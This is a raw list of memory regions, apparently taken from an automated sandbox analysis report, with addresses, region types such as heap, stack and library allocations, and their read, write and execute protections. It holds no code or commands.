trusted library allocation
page read and write
7FF848D90000
trusted library allocation
page read and write
7FF848B40000
trusted library allocation
page read and write
1F543451000
trusted library allocation
page read and write
1D3911FF000
heap
page read and write
7FF848C20000
trusted library allocation
page read and write
20F53E73000
heap
page read and write
256B7F11000
heap
page read and write
20958DAE000
trusted library allocation
page read and write
1D3931F0000
trusted library allocation
page read and write
1EBC1B0E000
heap
page read and write
E2B6D79000
stack
page read and write
7FF848CD0000
trusted library allocation
page read and write
20A2A663000
trusted library allocation
page read and write
20A2A111000
trusted library allocation
page read and write
2078D700000
heap
page read and write
5A4E000
stack
page read and write
1E2D586C000
trusted library allocation
page read and write
B87E0FE000
stack
page read and write
7FF848D24000
trusted library allocation
page read and write
1E2D5AA1000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
1E2E5750000
trusted library allocation
page read and write
5724000
trusted library allocation
page read and write
DB6000
heap
page read and write
2569DDA0000
trusted library allocation
page read and write
7FF848D70000
trusted library allocation
page read and write
20970946000
heap
page read and write
F01067F000
stack
page read and write
256B7EDB000
heap
page read and write
20A2A20D000
trusted library allocation
page read and write
20F55793000
trusted library allocation
page read and write
2078F5D0000
heap
page read and write
7FF848B70000
trusted library allocation
page read and write
7FF848E73000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
256B7ECF000
heap
page read and write
1E2D5400000
trusted library allocation
page read and write
1EBC1CD8000
heap
page read and write
7FF848D1A000
trusted library allocation
page read and write
7FF848F80000
trusted library allocation
page read and write
DBE487D000
stack
page read and write
7FF848D60000
trusted library allocation
page execute and read and write
1EBC1D04000
heap
page read and write
1EBBFECE000
heap
page read and write
1E2ED740000
heap
page read and write
1D3AB182000
heap
page read and write
7FF848D90000
trusted library allocation
page read and write
D00000
heap
page read and write
20958D83000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
20F6DF27000
heap
page read and write
1EBC1FD8000
heap
page read and write
2078FF8E000
trusted library allocation
page read and write
7FF848FC0000
trusted library allocation
page read and write
2078FC51000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
5D6A000
heap
page read and write
1D3AB580000
trusted library section
page read and write
7FF848DF0000
trusted library allocation
page read and write
5190000
heap
page read and write
7FF848E20000
trusted library allocation
page read and write
2F1F000
unkown
page read and write
7FF848C46000
trusted library allocation
page execute and read and write
2079F78C000
trusted library allocation
page read and write
7FF848F70000
trusted library allocation
page read and write
7FF848EC0000
trusted library allocation
page read and write
7FF848FBD000
trusted library allocation
page read and write
5069000
trusted library allocation
page read and write
14E0000
trusted library allocation
page read and write
1E2ED758000
heap
page read and write
2078FBF9000
trusted library allocation
page read and write
284B000
trusted library allocation
page read and write
20F6DF40000
heap
page read and write
591E000
stack
page read and write
20F53E77000
heap
page read and write
BD5850E000
stack
page read and write
1D39305D000
trusted library allocation
page read and write
D50000
trusted library allocation
page read and write
256A1269000
trusted library allocation
page read and write
207A787D000
heap
page read and write
20A3A1F9000
trusted library allocation
page read and write
2078F6E3000
trusted library allocation
page read and write
7FF848C56000
trusted library allocation
page execute and read and write
2079F75B000
trusted library allocation
page read and write
1F544247000
trusted library allocation
page read and write
2096894C000
trusted library allocation
page read and write
1E2ED8B0000
heap
page read and write
20968870000
trusted library allocation
page read and write
1D3A2E11000
trusted library allocation
page read and write
1D3A2C86000
trusted library allocation
page read and write
BD5767F000
stack
page read and write
1D392B40000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page execute and read and write
BD5757B000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
1D39474B000
trusted library allocation
page read and write
1F55A980000
heap
page execute and read and write
7FF848FA0000
trusted library allocation
page read and write
1D392C30000
heap
page execute and read and write
BE0000
trusted library allocation
page read and write
7FF848D02000
trusted library allocation
page read and write
29C09FC000
stack
page read and write
1D3A2CAB000
trusted library allocation
page read and write
20970BD5000
heap
page read and write
1EBBFECE000
heap
page read and write
BD57AFB000
stack
page read and write
7FF848B7B000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page read and write
20958DEB000
trusted library allocation
page read and write
1E2D5CB0000
trusted library allocation
page read and write
256A0A03000
trusted library allocation
page read and write
1EBBFD33000
heap
page read and write
2D1D000
trusted library allocation
page read and write
7A1F8D000
stack
page read and write
256B7F5A000
heap
page read and write
256AFA21000
trusted library allocation
page read and write
7FF848D40000
trusted library allocation
page execute and read and write
20F57393000
trusted library allocation
page read and write
1EBC1CC5000
heap
page read and write
1E2D5798000
trusted library allocation
page read and write
7FF848DA0000
trusted library allocation
page read and write
DBE477E000
stack
page read and write
20A29D70000
heap
page execute and read and write
7FF848E70000
trusted library allocation
page read and write
20F573ED000
trusted library allocation
page read and write
7FF848D50000
trusted library allocation
page execute and read and write
256A1822000
trusted library allocation
page read and write
922BC76000
stack
page read and write
1EBC1B36000
heap
page read and write
2078D7E3000
heap
page read and write
2095889E000
trusted library allocation
page read and write
20F6E040000
heap
page read and write
1EBBFD1A000
heap
page read and write
20F6E066000
heap
page read and write
20958DB9000
trusted library allocation
page read and write
256AFCEE000
trusted library allocation
page read and write
1F55A42A000
heap
page read and write
1D3A2EB6000
trusted library allocation
page read and write
C50000
heap
page read and write
20958820000
trusted library section
page read and write
1E2D38C5000
heap
page read and write
1F552490000
trusted library allocation
page read and write
7FF848EE0000
trusted library allocation
page read and write
BD578FE000
stack
page read and write
256B7D60000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
2078F7FB000
trusted library allocation
page read and write
256AFA10000
trusted library allocation
page read and write
20958871000
trusted library allocation
page read and write
7FF848D14000
trusted library allocation
page read and write
7A0FFE000
stack
page read and write
7FF848E20000
trusted library allocation
page read and write
BD5858D000
stack
page read and write
1E2D575F000
trusted library allocation
page read and write
BEA000
trusted library allocation
page execute and read and write
7FF848E90000
trusted library allocation
page read and write
1EBC1B5E000
heap
page read and write
2078F801000
trusted library allocation
page read and write
C60000
heap
page read and write
35528FE000
stack
page read and write
922B753000
stack
page read and write
2AF0000
heap
page read and write
209588A6000
trusted library allocation
page read and write
E2B6FFF000
stack
page read and write
6ED0000
heap
page read and write
B10000
heap
page read and write
14F4000
trusted library allocation
page read and write
20A3A1C3000
trusted library allocation
page read and write
20F65CB4000
trusted library allocation
page read and write
7FF848D00000
trusted library allocation
page execute and read and write
1F544222000
trusted library allocation
page read and write
2569F6BF000
heap
page read and write
7FF848E80000
trusted library allocation
page read and write
B50000
heap
page read and write
1EBBFD33000
heap
page read and write
DBE497B000
stack
page read and write
7FF848C20000
trusted library allocation
page execute and read and write
29C0A7F000
stack
page read and write
2AB5000
trusted library allocation
page read and write
1EBC1B6B000
heap
page read and write
1F542350000
heap
page read and write
20968959000
trusted library allocation
page read and write
20957FC0000
heap
page read and write
1D3AB3E4000
heap
page read and write
E2B6F7E000
stack
page read and write
20A2A9E4000
trusted library allocation
page read and write
1D3947B1000
trusted library allocation
page read and write
5890000
heap
page read and write
1F55A8F0000
heap
page read and write
2078F7AE000
trusted library allocation
page read and write
7FF848D90000
trusted library allocation
page read and write
20956730000
heap
page read and write
7FF848FE0000
trusted library allocation
page read and write
209688DD000
trusted library allocation
page read and write
2079F71D000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page read and write
DBE4577000
stack
page read and write
1E2D5855000
trusted library allocation
page read and write
DBE42FE000
stack
page read and write
7FF848D22000
trusted library allocation
page read and write
2F7E000
stack
page read and write
4FF0000
heap
page read and write
20A3A1AB000
trusted library allocation
page read and write
52AE000
stack
page read and write
B87E17B000
stack
page read and write
209591AC000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
F010B7B000
stack
page read and write
7FF848DE0000
trusted library allocation
page read and write
7FF848BF0000
trusted library allocation
page execute and read and write
20958974000
trusted library allocation
page read and write
B87DFFE000
stack
page read and write
20F55A10000
heap
page execute and read and write
7FF848B4D000
trusted library allocation
page execute and read and write
E2B7B8D000
stack
page read and write
5D10000
heap
page execute and read and write
7FF848DC0000
trusted library allocation
page read and write
1D3A2E24000
trusted library allocation
page read and write
7FF848E80000
trusted library allocation
page read and write
20F558F0000
heap
page read and write
BD577F6000
stack
page read and write
BF7000
trusted library allocation
page execute and read and write
7FF848E90000
trusted library allocation
page read and write
2569DC00000
heap
page read and write
7FF848D10000
trusted library allocation
page execute and read and write
209587E0000
heap
page execute and read and write
7FF848EB0000
trusted library allocation
page read and write
1740000
trusted library allocation
page read and write
2078FF6F000
trusted library allocation
page read and write
1D39323F000
trusted library allocation
page read and write
1D393216000
trusted library allocation
page read and write
20A3A1D9000
trusted library allocation
page read and write
7FF848DD0000
trusted library allocation
page read and write
7FF848CE2000
trusted library allocation
page read and write
A30000
heap
page read and write
207A7AB0000
heap
page read and write
20A3A1E9000
trusted library allocation
page read and write
1F5441FD000
trusted library allocation
page read and write
1D3A2F60000
trusted library allocation
page read and write
20958030000
heap
page read and write
20F6DE89000
heap
page read and write
54EE000
stack
page read and write
2569DE20000
heap
page execute and read and write
1E2ED802000
heap
page read and write
BDD000
trusted library allocation
page execute and read and write
2078D6A0000
heap
page read and write
20970980000
heap
page read and write
5746000
trusted library allocation
page read and write
1E2D38C0000
heap
page read and write
1E2D57DD000
trusted library allocation
page read and write
151A000
trusted library allocation
page execute and read and write
209588BE000
trusted library allocation
page read and write
FF0000
trusted library allocation
page read and write
1D391310000
heap
page readonly
1E2ED8A7000
heap
page execute and read and write
2569F981000
heap
page read and write
209567B2000
heap
page read and write
2569DCC0000
heap
page read and write
209565D0000
heap
page read and write
1E2D5730000
heap
page execute and read and write
1EBC1D10000
heap
page read and write
7FF848BFC000
trusted library allocation
page execute and read and write
1D3943E1000
trusted library allocation
page read and write
7FF848D02000
trusted library allocation
page read and write
20A2A101000
trusted library allocation
page read and write
7FF848FB6000
trusted library allocation
page read and write
256B7ED3000
heap
page read and write
20970B20000
heap
page read and write
256AFD08000
trusted library allocation
page read and write
2079F77A000
trusted library allocation
page read and write
9E7000
stack
page read and write
7FF848C90000
trusted library allocation
page execute and read and write
7FF848D42000
trusted library allocation
page read and write
F0107F7000
stack
page read and write
5734000
trusted library allocation
page read and write
1D3947B7000
trusted library allocation
page read and write
29C097E000
stack
page read and write
209566B0000
heap
page read and write
1E2ED752000
heap
page read and write
1F55AC2F000
heap
page read and write
207A79A0000
heap
page read and write
7FF848B80000
trusted library allocation
page read and write
1F5408A7000
heap
page read and write
2078FC05000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
1EBBFB50000
heap
page read and write
1D39479E000
trusted library allocation
page read and write
7FF848D40000
trusted library allocation
page read and write
5530000
heap
page read and write
7FF848D14000
trusted library allocation
page read and write
B87E3B6000
stack
page read and write
20F53FB4000
heap
page read and write
1F55A953000
heap
page read and write
7FF848DB0000
trusted library allocation
page read and write
E2B6EFE000
stack
page read and write
20A283AD000
heap
page read and write
20A2A9E8000
trusted library allocation
page read and write
20957FC5000
heap
page read and write
1D39122B000
heap
page read and write
2078F6E8000
trusted library allocation
page read and write
7FF848F40000
trusted library allocation
page read and write
20F558F4000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
7FF848DC0000
trusted library allocation
page read and write
20958E15000
trusted library allocation
page read and write
1EBBFEC5000
heap
page read and write
256A1827000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
2569FA7D000
trusted library allocation
page read and write
1D3AB3B2000
heap
page read and write
2078F660000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
1D39128F000
heap
page read and write
2BF0000
heap
page read and write
2078FC5C000
trusted library allocation
page read and write
1430000
heap
page read and write
20958D8E000
trusted library allocation
page read and write
20F6DEF2000
heap
page read and write
2C0557A0000
heap
page read and write
20958650000
heap
page read and write
7FF848F80000
trusted library allocation
page read and write
207A7834000
heap
page read and write
1E2D3770000
heap
page read and write
1446000
heap
page read and write
4EE9000
stack
page read and write
7FF848B43000
trusted library allocation
page execute and read and write
1F5436C7000
trusted library allocation
page read and write
1D3AB0DE000
heap
page read and write
7FF848C16000
trusted library allocation
page execute and read and write
7FF848D02000
trusted library allocation
page read and write
7FF848B6D000
trusted library allocation
page execute and read and write
35525FF000
stack
page read and write
20A28290000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
DBE3FFE000
stack
page read and write
4121000
trusted library allocation
page read and write
1E2D3847000
heap
page read and write
C8E000
stack
page read and write
1E2D3802000
heap
page read and write
DBE467A000
stack
page read and write
2078FF92000
trusted library allocation
page read and write
2078F7B7000
trusted library allocation
page read and write
7FF848FB0000
trusted library allocation
page read and write
20A42535000
heap
page read and write
2569DD09000
heap
page read and write
21CAFD60000
heap
page read and write
CCE000
stack
page read and write
21CAFDA0000
heap
page read and write
1D392B42000
trusted library allocation
page read and write
209567E2000
heap
page read and write
2079F781000
trusted library allocation
page read and write
7F760000
trusted library allocation
page execute and read and write
1D39440D000
trusted library allocation
page read and write
1EBC1AA2000
heap
page read and write
209688F5000
trusted library allocation
page read and write
256A09AA000
trusted library allocation
page read and write
20958DD3000
trusted library allocation
page read and write
2078FFC1000
trusted library allocation
page read and write
2569F890000
heap
page execute and read and write
1F55AC40000
heap
page read and write
7FF848F33000
trusted library allocation
page read and write
DBE4477000
stack
page read and write
7A1239000
stack
page read and write
7FF848E40000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
20F56732000
trusted library allocation
page read and write
20A2A9C0000
trusted library allocation
page read and write
20A28150000
heap
page read and write
1D3A2CD0000
trusted library allocation
page read and write
7FF848ED2000
trusted library allocation
page read and write
256AFA31000
trusted library allocation
page read and write
2079F6B0000
trusted library allocation
page read and write
1F543CB0000
trusted library allocation
page read and write
922CC8C000
stack
page read and write
2078D7E5000
heap
page read and write
7FF848EA0000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
20F65B71000
trusted library allocation
page read and write
256A0D07000
trusted library allocation
page read and write
7FF848CE1000
trusted library allocation
page read and write
58DE000
stack
page read and write
20A29D80000
heap
page execute and read and write
7FF848F90000
trusted library allocation
page execute and read and write
20A28460000
heap
page read and write
20A283D5000
heap
page read and write
1EBC1AC7000
heap
page read and write
1F55AD70000
trusted library allocation
page read and write
7FF848D1A000
trusted library allocation
page read and write
5500000
trusted library allocation
page execute and read and write
FEB000
stack
page read and write
1D3AB3D6000
heap
page read and write
7FF848C60000
trusted library allocation
page execute and read and write
20A2A21D000
trusted library allocation
page read and write
29C0F7E000
stack
page read and write
400000
remote allocation
page execute and read and write
1F543632000
trusted library allocation
page read and write
E2B678F000
stack
page read and write
BC4000
trusted library allocation
page read and write
7FF848C50000
trusted library allocation
page execute and read and write
20F53E3A000
heap
page read and write
DBE554E000
stack
page read and write
1E2D601C000
trusted library allocation
page read and write
1EBC1DC1000
heap
page read and write
20968939000
trusted library allocation
page read and write
1D39473A000
trusted library allocation
page read and write
B87E4BC000
stack
page read and write
7FF848DC0000
trusted library allocation
page read and write
B87E2F8000
stack
page read and write
7FF848D44000
trusted library allocation
page read and write
35521FE000
stack
page read and write
53AE000
stack
page read and write
7FF848E80000
trusted library allocation
page read and write
20F55AC7000
heap
page execute and read and write
1EBC206D000
heap
page read and write
7A113F000
stack
page read and write
20A2A5DD000
trusted library allocation
page read and write
1E2D5710000
heap
page execute and read and write
256B7E9F000
heap
page read and write
20F53E2A000
heap
page read and write
2096891B000
trusted library allocation
page read and write
1F55A96C000
heap
page read and write
7FF848B74000
trusted library allocation
page read and write
B87E53E000
stack
page read and write
7A0BCE000
stack
page read and write
7FF848C2C000
trusted library allocation
page execute and read and write
20A3A195000
trusted library allocation
page read and write
DBE46F8000
stack
page read and write
1EBBFC7B000
heap
page read and write
2A7D000
stack
page read and write
1E2D5096000
heap
page read and write
7FF848E90000
trusted library allocation
page read and write
20A2A14F000
trusted library allocation
page read and write
2C055760000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
1D394798000
trusted library allocation
page read and write
256A0DC2000
trusted library allocation
page read and write
1F5433D1000
trusted library allocation
page read and write
20958DAA000
trusted library allocation
page read and write
7FF848B5B000
trusted library allocation
page read and write
7FF848D54000
trusted library allocation
page read and write
20970B10000
heap
page execute and read and write
20956771000
heap
page read and write
20968941000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
1E2D5B85000
trusted library allocation
page read and write
F01154E000
stack
page read and write
7FF848C80000
trusted library allocation
page execute and read and write
1F55AE30000
heap
page read and write
1F55ACDB000
heap
page read and write
E2B6B7E000
stack
page read and write
7FF848EAC000
trusted library allocation
page read and write
1EBBFD33000
heap
page read and write
1D3A2EAF000
trusted library allocation
page read and write
1F540868000
heap
page read and write
1000000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
2569F8F0000
heap
page read and write
209708E1000
heap
page read and write
7FF848EA2000
trusted library allocation
page read and write
1D393247000
trusted library allocation
page read and write
256B7EE3000
heap
page read and write
7FF848D20000
trusted library allocation
page execute and read and write
1E2D3870000
heap
page read and write
1F542360000
trusted library allocation
page read and write
1EBC1D05000
heap
page read and write
1D3931AC000
trusted library allocation
page read and write
156F000
heap
page read and write
52FE000
stack
page read and write
7FF848E60000
trusted library allocation
page read and write
1D3A2DFC000
trusted library allocation
page read and write
1780000
heap
page execute and read and write
2078FFEA000
trusted library allocation
page read and write
256B802A000
heap
page read and write
2078FBB3000
trusted library allocation
page read and write
2079F789000
trusted library allocation
page read and write
7FF848C1C000
trusted library allocation
page execute and read and write
1E2D5580000
heap
page read and write
1D392C78000
trusted library allocation
page read and write
1D3A2E98000
trusted library allocation
page read and write
7FF848DF0000
trusted library allocation
page read and write
1D3AB610000
heap
page read and write
1D39438F000
trusted library allocation
page read and write
2078DA75000
heap
page read and write
FD0000
trusted library allocation
page read and write
1F55ACCF000
heap
page read and write
256A0776000
trusted library allocation
page read and write
56BF000
stack
page read and write
BD5747D000
stack
page read and write
7FF848D42000
trusted library allocation
page read and write
1F540A50000
heap
page read and write
1E2E57AF000
trusted library allocation
page read and write
20F55D32000
trusted library allocation
page read and write
922BAFE000
stack
page read and write
1F55AC7A000
heap
page read and write
1EBC1CEC000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
1D3A2E52000
trusted library allocation
page read and write
1F5434B4000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
5075000
trusted library allocation
page read and write
92A255D000
stack
page read and write
20F6DF60000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
2078D730000
heap
page read and write
2569F810000
heap
page read and write
2569DB20000
heap
page read and write
BD5712F000
stack
page read and write
286D000
trusted library allocation
page read and write
52BD000
stack
page read and write
1060000
heap
page read and write
1E2D5AA5000
trusted library allocation
page read and write
1E2D3800000
heap
page read and write
1EBC1B9E000
heap
page read and write
BD571EF000
stack
page read and write
20A28534000
heap
page read and write
20A28530000
heap
page read and write
5D20000
heap
page read and write
1F543BA4000
trusted library allocation
page read and write
20F6E059000
heap
page read and write
20A2A5E5000
trusted library allocation
page read and write
1D3A2E1F000
trusted library allocation
page read and write
207A7B0E000
heap
page read and write
7FF848BCC000
trusted library allocation
page execute and read and write
1EBBFC50000
heap
page read and write
53EE000
stack
page read and write
2078D970000
heap
page read and write
F01057D000
stack
page read and write
20958DFE000
trusted library allocation
page read and write
2078F7B4000
trusted library allocation
page read and write
1EBC1CEC000
heap
page read and write
2569DE94000
heap
page read and write
2078D7F1000
heap
page read and write
DBE48FE000
stack
page read and write
1D3911ED000
heap
page read and write
2078FC36000
trusted library allocation
page read and write
209567B0000
heap
page read and write
7FF848B33000
trusted library allocation
page execute and read and write
153B000
heap
page read and write
2569F92F000
heap
page read and write
C20000
heap
page read and write
1E2D5BC3000
trusted library allocation
page read and write
1E2D37BA000
heap
page read and write
DCD000
heap
page read and write
1EBC1F22000
heap
page read and write
1010000
trusted library allocation
page read and write
1EBC1FD8000
heap
page read and write
7FF848D28000
trusted library allocation
page read and write
1F54320B000
trusted library allocation
page read and write
29C0523000
stack
page read and write
1D3A2C76000
trusted library allocation
page read and write
1EBC1CFC000
heap
page read and write
7FF848CEA000
trusted library allocation
page read and write
7FF848D70000
trusted library allocation
page read and write
1527000
trusted library allocation
page execute and read and write
20F55AC0000
heap
page execute and read and write
1E2D384B000
heap
page read and write
20F56FC7000
trusted library allocation
page read and write
1D3AB270000
heap
page execute and read and write
7FF848DE0000
trusted library allocation
page read and write
285A000
trusted library allocation
page read and write
1E2D5AC6000
trusted library allocation
page read and write
20F53E4C000
heap
page read and write
7FF848C80000
trusted library allocation
page execute and read and write
29C05AE000
stack
page read and write
3120000
heap
page read and write
7FF848DC0000
trusted library allocation
page read and write
1E2D585E000
trusted library allocation
page read and write
1EBBFD27000
heap
page read and write
1EBC1FD4000
heap
page read and write
2078DA85000
heap
page read and write
FF0000
trusted library allocation
page execute and read and write
256AFA01000
trusted library allocation
page read and write
7FF848CF1000
trusted library allocation
page read and write
7FF848B9C000
trusted library allocation
page execute and read and write
2569FA01000
trusted library allocation
page read and write
1E2D5858000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
1D3A2C70000
trusted library allocation
page read and write
1D39326B000
trusted library allocation
page read and write
7FF848B63000
trusted library allocation
page execute and read and write
1F552441000
trusted library allocation
page read and write
922BF38000
stack
page read and write
20A2A623000
trusted library allocation
page read and write
209708B2000
heap
page read and write
20958850000
heap
page execute and read and write
7FF848EA0000
trusted library allocation
page read and write
20F55B87000
trusted library allocation
page read and write
E2B7B0E000
stack
page read and write
256A128F000
trusted library allocation
page read and write
1EBC1AA0000
heap
page read and write
2078FBFD000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
7FF848E40000
trusted library allocation
page read and write
7FF848EDC000
trusted library allocation
page read and write
7FF848BF0000
trusted library allocation
page read and write
7FF848D12000
trusted library allocation
page read and write
20A3A1E1000
trusted library allocation
page read and write
7FF848E90000
trusted library allocation
page read and write
1F540A70000
heap
page read and write
30BD000
stack
page read and write
305F000
stack
page read and write
7FF848E00000
trusted library allocation
page read and write
1EBC1D10000
heap
page read and write
2CE0000
heap
page read and write
2569DCCA000
heap
page read and write
7FF848BE6000
trusted library allocation
page read and write
2095914F000
trusted library allocation
page read and write
2872000
trusted library allocation
page read and write
1D3AB380000
heap
page read and write
5D8E000
stack
page read and write
20A2A606000
trusted library allocation
page read and write
20A42330000
heap
page execute and read and write
7FF848D20000
trusted library allocation
page execute and read and write
20959182000
trusted library allocation
page read and write
20958DC5000
trusted library allocation
page read and write
7FF848DA0000
trusted library allocation
page read and write
2569DCDE000
heap
page read and write
20970B86000
heap
page read and write
1F540C44000
heap
page read and write
7FF848DA0000
trusted library allocation
page read and write
20959153000
trusted library allocation
page read and write
7FF848B4B000
trusted library allocation
page read and write
209567D6000
heap
page read and write
1F55ABA3000
heap
page read and write
20F5590B000
heap
page read and write
533E000
stack
page read and write
7FF848B33000
trusted library allocation
page execute and read and write
20A2A65F000
trusted library allocation
page read and write
20958D7B000
trusted library allocation
page read and write
1E2ED79D000
heap
page read and write
1F54089D000
heap
page read and write
7FF848D60000
trusted library allocation
page read and write
5370000
heap
page execute and read and write
7FF848CF0000
trusted library allocation
page execute and read and write
1D39322F000
trusted library allocation
page read and write
7FF848E50000
trusted library allocation
page read and write
2AE0000
trusted library allocation
page read and write
7FF848B50000
trusted library allocation
page read and write
20958DBD000
trusted library allocation
page read and write
1EBBFC59000
heap
page read and write
20958D29000
trusted library allocation
page read and write
7FF848D80000
trusted library allocation
page read and write
1500000
trusted library allocation
page read and write
20A424B0000
heap
page read and write
7FF848CD2000
trusted library allocation
page read and write
BB0000
trusted library allocation
page read and write
4E6F000
stack
page read and write
7A0E7E000
stack
page read and write
5FEB000
stack
page read and write
DBE534E000
stack
page read and write
7FF848BEC000
trusted library allocation
page execute and read and write
256B7EAF000
heap
page read and write
7FF848DB0000
trusted library allocation
page read and write
256B8015000
heap
page read and write
1D3AB18C000
heap
page read and write
DBE3FBF000
unkown
page read and write
1EBBFD1A000
heap
page read and write
20A2A626000
trusted library allocation
page read and write
6EC0000
heap
page read and write
7FF848E00000
trusted library allocation
page read and write
256A1802000
trusted library allocation
page read and write
256B7EA8000
heap
page read and write
104E000
stack
page read and write
1E2D381B000
heap
page read and write
BC0000
trusted library allocation
page read and write
7FF848E00000
trusted library allocation
page read and write
2078FC4C000
trusted library allocation
page read and write
20958D5E000
trusted library allocation
page read and write
1F540860000
heap
page read and write
20A2A14A000
trusted library allocation
page read and write
207A7ACC000
heap
page read and write
5749000
trusted library allocation
page read and write
7FF848E30000
trusted library allocation
page read and write
7FF848B64000
trusted library allocation
page read and write
256AFCF8000
trusted library allocation
page read and write
14DE000
stack
page read and write
7FF848D66000
trusted library allocation
page read and write
256A0CA6000
trusted library allocation
page read and write
E1A000
heap
page read and write
20A2A260000
trusted library allocation
page read and write
5701000
trusted library allocation
page read and write
2078F7B1000
trusted library allocation
page read and write
B87F0CE000
stack
page read and write
29C0AFE000
stack
page read and write
4F06000
trusted library allocation
page read and write
256A0ABE000
trusted library allocation
page read and write
1D3911E3000
heap
page read and write
1EBBFEC0000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
7FF848D60000
trusted library allocation
page read and write
2078F690000
heap
page execute and read and write
1E2ED82A000
heap
page read and write
7FF848E60000
trusted library allocation
page read and write
20A42293000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
922BB79000
stack
page read and write
20958E05000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
1E2D5793000
trusted library allocation
page read and write
7FF848DD0000
trusted library allocation
page read and write
207A7CB0000
heap
page execute and read and write
20958590000
trusted library allocation
page read and write
2078D7BD000
heap
page read and write
2852000
trusted library allocation
page read and write
BD5797F000
stack
page read and write
7FF848B44000
trusted library allocation
page read and write
1F543580000
trusted library allocation
page read and write
7A153C000
stack
page read and write
5760000
trusted library allocation
page read and write
283E000
stack
page read and write
1EBC1B2A000
heap
page read and write
7FF848ED8000
trusted library allocation
page read and write
1F542354000
heap
page read and write
20956728000
heap
page read and write
7FF848D21000
trusted library allocation
page read and write
7FF848E7A000
trusted library allocation
page read and write
20F57734000
trusted library allocation
page read and write
1EBC1B2C000
heap
page read and write
2AD4000
trusted library allocation
page read and write
2569F9F0000
heap
page read and write
20F53DF0000
heap
page read and write
256AFA70000
trusted library allocation
page read and write
1F542290000
trusted library section
page read and write
20958CE4000
trusted library allocation
page read and write
2078FC32000
trusted library allocation
page read and write
209567F3000
heap
page read and write
7FF848F00000
trusted library allocation
page read and write
2078D7EB000
heap
page read and write
F0109FE000
stack
page read and write
7FF848B64000
trusted library allocation
page read and write
7FF848E70000
trusted library allocation
page read and write
2D0F000
trusted library allocation
page read and write
C40000
heap
page read and write
1D391060000
heap
page read and write
20958DCF000
trusted library allocation
page read and write
7FF848C20000
trusted library allocation
page read and write
2569F937000
heap
page read and write
7A0EFD000
stack
page read and write
7FF848E00000
trusted library allocation
page read and write
7FF848D00000
trusted library allocation
page execute and read and write
7FF848DA0000
trusted library allocation
page read and write
7FF848B6D000
trusted library allocation
page execute and read and write
2078FA52000
trusted library allocation
page read and write
F010779000
stack
page read and write
7A133E000
stack
page read and write
2079F753000
trusted library allocation
page read and write
20958FB2000
trusted library allocation
page read and write
DD2000
heap
page read and write
1F5422A0000
trusted library allocation
page read and write
7FF848C50000
trusted library allocation
page execute and read and write
1F540970000
heap
page read and write
7FF848C26000
trusted library allocation
page read and write
DBE427F000
stack
page read and write
1E2D5430000
heap
page readonly
1EBC1FD4000
heap
page read and write
7FF848B72000
trusted library allocation
page read and write
1EBC1CC3000
heap
page read and write
20958DD7000
trusted library allocation
page read and write
1E2D37C2000
heap
page read and write
BD5787E000
stack
page read and write
20A28470000
trusted library allocation
page read and write
2078DA80000
heap
page read and write
1F542410000
heap
page read and write
7FF848E10000
trusted library allocation
page read and write
1EBC1B5E000
heap
page read and write
7FF848B62000
trusted library allocation
page read and write
20A284D0000
heap
page read and write
20F5766E000
trusted library allocation
page read and write
20958D96000
trusted library allocation
page read and write
1EBC1F22000
heap
page read and write
7FF848EC9000
trusted library allocation
page read and write
E2B6DF6000
stack
page read and write
1EBC1B9E000
heap
page read and write
7FF848D44000
trusted library allocation
page read and write
922B7DE000
unkown
page read and write
5E90000
trusted library allocation
page read and write
7FF848CE0000
trusted library allocation
page read and write
20A2A648000
trusted library allocation
page read and write
922BD79000
stack
page read and write
2078D6C0000
heap
page read and write
50B0000
heap
page read and write
1EBC1AE8000
heap
page read and write
BD570A5000
stack
page read and write
1EBC1B4E000
heap
page read and write
1F55A8B9000
heap
page read and write
922C13F000
stack
page read and write
1D3911C0000
heap
page read and write
20A3A110000
trusted library allocation
page read and write
1EBC1CF1000
heap
page read and write
20A28480000
heap
page readonly
There are 1715 hidden memdumps, click here to show them.